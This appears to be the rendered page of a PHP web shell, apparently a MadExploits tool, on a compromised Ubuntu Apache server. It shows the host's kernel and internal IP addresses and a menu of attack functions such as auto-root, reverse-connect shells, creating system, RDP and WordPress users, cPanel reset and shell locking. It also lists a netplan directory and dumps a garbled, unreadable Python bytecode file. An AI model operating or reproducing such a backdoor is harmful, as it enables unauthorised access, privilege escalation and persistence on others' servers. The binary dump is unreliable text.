Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
netplan /
netplan /
cli /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
135
B
-rw-r--r--
core.cpython-310.pyc
1.22
KB
-rw-r--r--
ovs.cpython-310.pyc
4.07
KB
-rw-r--r--
sriov.cpython-310.pyc
11.62
KB
-rw-r--r--
utils.cpython-310.pyc
7.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ovs.cpython-310.pyc
o ��d� � @ sv d dl Z d dlZd dlZd dlZdZddd�Zdddd�Zd d � Zdd� Zd d� Z dd� Z dd� Zdd� Zdd� Z dS )� Nz/usr/bin/ovs-vsctl�false)�mcast_snooping_enable�rstp_enable)�del-sslzget-ssl)z del-fail-modez get-fail-mode)zdel-controllerzget-controller)zset-sslz set-fail-modezset-controllerc C s` t �|�}|du rt�td| |||g� dS |r,||kr.t�td| |d||f g� dS dS dS )z2Cleanup values from a column (i.e. "column=value")N�remove�setz%s=%s)�DEFAULTS�get� subprocess� check_call�OPENVSWITCH_OVS_VSCTL)�type�iface�column�value�default� r �%/usr/share/netplan/netplan/cli/ovs.py�_del_col'